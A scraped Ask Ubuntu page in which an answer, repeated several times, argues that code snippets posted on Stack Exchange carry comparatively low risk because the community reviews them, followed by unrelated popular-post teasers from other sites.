As said, using code you didn't write yourself is a risk. In short however: in general, I believe the code posted here, especially from answers that already live a bit longer or posted by people who are around a bit longer, is probably the least of your concerns.





share




























  • Also, code that's fine on MY system might break YOUR system, unintentionally.

    – waltinator
    Jul 4 at 13:11















4


















Excellent things have been said already, but let me add a few words from someone who posts those code snippets once in a while.



How can we be safe about code from this site that we install? You can't. Any piece of code could contain harmful - intentionally or not - elements. While that is also true for snippets on AU, you probably won't find a place with less risk than on AU or other SE sites. The reason is that not only snippets are in general relatively short and clear, but more importantly: anyone can (and will) look into the code, and anyone can comment on or flag a post. Any potential critic is visible directly on the post itself.



That is unlike some private websites where we can often see bad advice or inadvisable commands. If I am a crook and want to inject malicious code, the one environment I need to avoid is SE sites.



As said, using code you didn't write yourself is a risk. In short however: in general, I believe the code posted here, especially from answers that already live a bit longer or posted by people who are around a bit longer, is probably the least of your concerns.





share




























  • Also, code that's fine on MY system might break YOUR system, unintentionally.

    – waltinator
    Jul 4 at 13:11













4














4










4









Excellent things have been said already, but let me add a few words from someone who posts those code snippets once in a while.



How can we be safe about code from this site that we install? You can't. Any piece of code could contain harmful - intentionally or not - elements. While that is also true for snippets on AU, you probably won't find a place with less risk than on AU or other SE sites. The reason is that not only snippets are in general relatively short and clear, but more importantly: anyone can (and will) look into the code, and anyone can comment on or flag a post. Any potential critic is visible directly on the post itself.



That is unlike some private websites where we can often see bad advice or inadvisable commands. If I am a crook and want to inject malicious code, the one environment I need to avoid is SE sites.



As said, using code you didn't write yourself is a risk. In short however: in general, I believe the code posted here, especially from answers that already live a bit longer or posted by people who are around a bit longer, is probably the least of your concerns.





share
















Excellent things have been said already, but let me add a few words from someone who posts those code snippets once in a while.



How can we be safe about code from this site that we install? You can't. Any piece of code could contain harmful - intentionally or not - elements. While that is also true for snippets on AU, you probably won't find a place with less risk than on AU or other SE sites. The reason is that not only snippets are in general relatively short and clear, but more importantly: anyone can (and will) look into the code, and anyone can comment on or flag a post. Any potential critic is visible directly on the post itself.



That is unlike some private websites where we can often see bad advice or inadvisable commands. If I am a crook and want to inject malicious code, the one environment I need to avoid is SE sites.



As said, using code you didn't write yourself is a risk. In short however: in general, I believe the code posted here, especially from answers that already live a bit longer or posted by people who are around a bit longer, is probably the least of your concerns.






share














share



share








edited Jun 20 at 6:56









karel

69.4k8 silver badges26 bronze badges




69.4k8 silver badges26 bronze badges










answered Jun 19 at 18:27









Jacob VlijmJacob Vlijm

69.4k1 gold badge26 silver badges68 bronze badges




69.4k1 gold badge26 silver badges68 bronze badges















  • Also, code that's fine on MY system might break YOUR system, unintentionally.

    – waltinator
    Jul 4 at 13:11

















  • Also, code that's fine on MY system might break YOUR system, unintentionally.

    – waltinator
    Jul 4 at 13:11
















Also, code that's fine on MY system might break YOUR system, unintentionally.

– waltinator
Jul 4 at 13:11





Also, code that's fine on MY system might break YOUR system, unintentionally.

– waltinator
Jul 4 at 13:11



-

Popular posts from this blog

Tamil (spriik) Luke uk diar | Nawigatjuun

Image
Fering ArtiikelDrawiidisk Spriiken SölringÖömrangFeringHalunderHalifreeskMooringWiringhiirderKarhiirderGooshiirderDrawiidisk SpriikTamil NaduIndienSri Lanka (function()var node=document.getElementById("mw-dismissablenotice-anonplace");if(node)node.outerHTML="u003Cdiv class="mw-dismissable-notice"u003Eu003Cdiv class="mw-dismissable-notice-close"u003E[u003Ca tabindex="0" role="button"u003EFersteegu003C/au003E]u003C/divu003Eu003Cdiv class="mw-dismissable-notice-body"u003Eu003Cdiv id="localNotice" lang="frr" dir="ltr"u003Eu003Cdiv id="sitenotice"u003Enu003Ccenteru003Enu003Ctable class="rahmenfarbe4" style="border-style: solid; border-width: thin; width: 70%;"u003Ennu003Ctbodyu003Eu003Ctru003Enu003Ctd style="text-align:center;"u003Eu003Ca href="/wiki/Datei:Nordfriesischeflagge.svg" class="image"u003Eu003Cimg alt="Nordfriesische
Read more

Align equal signs while including text over equalitiesAMS align: left aligned text/math plus multicolumn alignmentMultiple alignmentsAligning equations in multiple placesNumbering and aligning an equation with multiple columnsHow to align one equation with another multline equationUsing \ in environments inside the begintabularxNumber equations and preserving alignment of equal signsHow can I align equations to the left and to the right?Double equation alignment problem within align enviromentAligned within align: Why are they right-aligned?

Image
Why didn't the Universal Translator speak whale? What is /dev/null and why can't I use hx on it? The work of mathematicians outside their professional environment Does the DOJ's declining to investigate the Trump-Zelensky call ruin the basis for impeachment? Are there any tricks to pushing a grand piano? Maintaining distance Does it require less energy to reach the Sun from Pluto's orbit than from Earth's orbit? Object Oriented Design: Where to place behavior that pertains to more than one type of object? Choice of solvent during thin layer chromatography How to catch creatures that can predict the next few minutes? Use floats or doubles when writing mobile games How come the Russian cognate for the Czech word "čerstvý" (fresh) means entirely the opposite thing (stale)? What are the limits on an impeached and not convicted president? How to calculate Limit of this sequence Bash-script as linux-service won't run, but executed
Read more

Where does the image of a data connector as a sharp metal spike originate from?Where does the concept of infected people turning into zombies only after death originate from?Where does the motif of a reanimated human head originate?Where did the notion that Dragons could speak originate?Where does the archetypal image of the 'Grey' alien come from?Where did the suffix '-Man' originate?Where does the notion of being injured or killed by an illusion originate?Where did the term “sophont” originate?Where does the trope of magic spells being driven by advanced technology originate from?Where did the term “the living impaired” originate?

Image
Automatically extend a Python list to N elements if it's too short? Fired for a policy I didnt know about, as well as another false reason Why isn't tilde recognised as home folder in this case? When does an Artillerist's Cannon have disadvantage? How large should a hole be for a bolt to go through? When is TeX better than LaTeX? How to determine if drill is suitable for concrete? Huygens Lander: Why The Short Battery Life? Why do people use bigger cassettes for lower gearing when they could instead use smaller chainrings? Is there a difference between downloading / installing a list of packages and downloading each packge by its own? Question about exercise 21.10 in The TeXbook How to publish a page using tridion core service client in sdl web 8.5 Can one get into trouble if one doesn't show up at the gate 30 minutes before departure (or whatever time window the boarding pass is indicating)? Does an action-reaction pair always contain the same
Read more